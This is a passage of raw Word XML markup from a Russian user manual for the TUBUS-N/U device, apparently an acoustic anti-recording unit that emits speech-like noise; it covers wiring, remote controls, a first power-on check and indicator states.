          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>работы</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>коммутационной</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>коробке</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ППДУ предусмотрена</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>фиксация</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>провода</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>стяжкой.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Что</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>бы</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сделать</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>правильное</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>подключение</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>следуйте</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>подсказкам</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>цвету подключаемых проводов в коммутационной коровке и</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ППДУ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="368" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ВАЖНО! Вы можете не использовать коммутационную коробку и ППДУ при установке и работе прибора. Достаточно подать напряжение питания от источника питания на соответствующие провода (красный и черный) и управлять прибором с РПДУ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="159" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>При этом необходимо использовать переходник для адаптера, за изолировать по отдельности оставшиеся провода. В данном варианте индикации работы прибора и ошибок — отсутствуют.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ВАЖНО! Желтый провод идущий в общем шлейфе является антенной приемника для РПДУ. При сильном укорачивании шлейфа возможно уменьшение дальности работы РПДУ. В технических характеристиках указана максимально возможная дальность работы РПДУ. В реальных условиях она может быть меньше, за счет присутствия ЭМИ, уменьшения емкости батарейки наличия экранирующих преград — это стоит учитывать при расположении пробора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Схама подключения ТУБУС — Н, ТУБУС — У.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="106" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3971"/>
        <w:gridCol w:w="4374"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="201"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3971" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="709"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>При одиночной установке</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4374" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="709"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>При параллельном включении</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251693568" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>360045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>130175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6836410" cy="2025650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="5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36410"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DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПЕРВОЕ ВКЛЮЧЕНИЕ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>После установки и подключения прибора включите адаптер в сеть 220В переменного напряжения. Проверьте</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">работоспособность прибора, для этого нажмите и удерживайте в течении 1 секунды кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POWER</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> на пульте ППДУ или кнопку А на пульте РПДУ. Загорится зеленым цветом индикатор работы </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. Устройство работает.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="147" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Для включения речеподобной помехи нажмите кнопку увеличения </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>громкости, в дальнейшем каждое нажатие этой кнопки приведет к увеличению громкости, для уменьшения громкости нажимайте кнопку «уменьшения громкости». При достижении минимального уровня громкости и повторном нажатии на кнопку — речеподобная помеха выключится.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="555" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Если все вышеописанные процедуры пройдены успешно — это означает, что прибор подключен правильно и все режимы работы проверены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="001E6CE9" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6CE9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>СОСТОЯНИЕ ИНДИКАТОРОВ</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9903" w:type="dxa"/>
        <w:tblInd w:w="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firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="2391"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="434"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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Состояние</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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Событие</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="239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Реакция</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126"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Что делать</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="311"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9903" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123" w:right="4562"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Индикатор MODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="431"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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Горит зеленым цветом</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693"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Прибор готов к работе</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="239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Полностью работает</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1140"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Мигает зеленым цветом, количество вспышек от 1-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Неисправность ультразвукового канала.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Количество вспышек</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123" w:right="220"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>показывает сколько каналов неисправно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
